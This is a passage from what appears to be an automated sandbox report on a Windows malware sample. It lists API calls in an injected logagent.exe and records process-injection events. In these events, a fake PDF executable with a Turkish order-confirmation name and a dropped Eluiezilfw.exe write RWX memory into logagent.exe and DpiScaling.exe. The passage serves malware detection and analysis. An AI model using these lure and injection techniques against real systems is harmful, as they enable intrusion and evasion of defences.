har_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr3_2_00410586
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,3_2_0040728F
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE3_2_0040477E
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,3_2_00403325
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,3_2_00412BEE
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10548C1E getenv,FindFirstFileA,FindClose,GetLastError,GetLastError,FindClose,3_2_10548C1E
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10544CB4 FindFirstFileW,3_2_10544CB4
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_1055457D FindFirstFileW,FindNextFileW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,FindClose,3_2_1055457D
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_1054610D _EH_prolog,socket,connect,_CxxThrowException,FindFirstFileW,_CxxThrowException,FindNextFileW,_CxxThrowException,_CxxThrowException,FindClose,atoi,_CxxThrowException,atoi,FindClose,RtlExitUserThread,3_2_1054610D
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10546599 FindFirstFileW,FindNextFileW,FindClose,3_2_10546599
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10548EAA getenv,FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindClose,FindClose,3_2_10548EAA
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10551F15 FindFirstFileW,3_2_10551F15
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00403C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$cha3_2_00403C4A
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310315497.00000000007A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310315497.00000000007A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWpp.com
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310005988.0000000000775000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8{%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,3_2_00409908
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_105410AC mov eax, dword ptr fs:[00000030h] 3_2_105410AC

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 940000
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 9D0000
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 9E0000
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 9F0000
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: C00000
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: C10000
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 950000
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 960000
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 970000
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 10540000
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 980000
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 990000
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 5F0000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 880000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: C50000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 800000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 810000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 820000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 830000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 840000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 850000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 10540000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 860000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 870000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 1000000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 1010000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 4BA0000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3060000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3070000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3080000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3090000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 30A0000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 30B0000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 10540000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 30C0000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 30D0000Jump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 10540000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 940000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 9D0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 9E0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 9F0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: C00000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: C10000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 950000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 960000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 970000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 980000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 990000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 10540000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 5F0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 880000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: C50000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 800000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 810000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 820000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 830000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 840000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 850000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 860000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 870000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 10540000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 1000000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 1010000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 4BA0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 3060000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 3070000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 3080000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 3090000 protect: page execute and read and writeJump to behavior
